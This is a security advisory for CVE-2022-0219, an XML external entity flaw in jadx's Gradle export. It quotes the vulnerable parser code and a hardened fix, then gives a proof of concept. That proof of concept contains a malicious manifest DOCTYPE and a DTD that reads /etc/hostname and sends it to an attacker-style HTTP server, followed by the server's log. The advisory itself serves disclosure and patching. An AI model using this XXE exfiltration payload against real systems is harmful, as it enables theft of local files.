CVE-2022-0219: Improper Restriction of XML External Entity Reference in jadx

Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.


Description

The parseXml() function in ExportGradleProject is not secured against XXE because it does not set the disallow-doctype-decl attribute; JADX is therefore vulnerable to XXE when it parses a malicious AndroidManifest.xml while exporting an Android app to Gradle. In

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

The DocumentBuilderFactory does not have the disallow-doctype-decl attribute set to true, leaving the parser vulnerable to XXE.
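For comparison, the following is an added example (not code from the jadx project or from the advisory author) of how a DocumentBuilderFactory can be hardened so that a DOCTYPE declaration in a manifest is refused before any entity is resolved. The class name SafeManifestParser, the helper hardenedBuilder() and the two sample manifest strings are assumptions constructed for this illustration; the feature and property names are the standard JAXP/Xerces ones.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Hypothetical hardened counterpart to the vulnerable parseXml() quoted above.
public class SafeManifestParser {

    // Builds a parser that rejects any DOCTYPE outright, so neither general nor
    // parameter entities can be declared, and adds defence-in-depth settings in
    // case a parser implementation ignores the primary feature.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Primary fix: the missing setting named in the advisory.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth: no external entity resolution, no external DTD loading.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        // JAXP 1.5 properties: empty string means no external access protocol is allowed.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory.newDocumentBuilder();
    }

    // Same signature shape as the vulnerable call site: parse XML held in a String.
    static Document parseXml(String xmlContent)
            throws ParserConfigurationException, SAXException, IOException {
        return hardenedBuilder().parse(new InputSource(new StringReader(xmlContent)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a benign manifest fragment still parses normally.
        String benign = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
                + "<manifest package=\"com.example.app\"><application/></manifest>";
        System.out.println("benign root element: "
                + parseXml(benign).getDocumentElement().getTagName());

        // Constructed sample: a manifest carrying a DOCTYPE is rejected by the
        // parser before it ever tries to fetch or expand anything.
        String withDoctype = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE manifest SYSTEM \"manifest.dtd\">"
                + "<manifest/>";
        try {
            parseXml(withDoctype);
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (SAXException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

With the JDK's built-in Xerces parser the second parse fails with a SAXParseException stating that DOCTYPE is disallowed when the feature is set to true; a legitimate AndroidManifest.xml never needs a DOCTYPE, so refusing it costs nothing for the export use case.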

Proof Of Concept

1: Build an android app with the following AndroidManifest.xml stored. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and place the following in a file named malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, open an HTTP server (which mimics an attacker server) and leave it running

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics an attacker server) will receive the contents of the victim's /etc/hostname

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability is capable of XXE (info disclosure) when users are tricked into exporting a malicious Android App with a crafted AndroidManifest file to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2
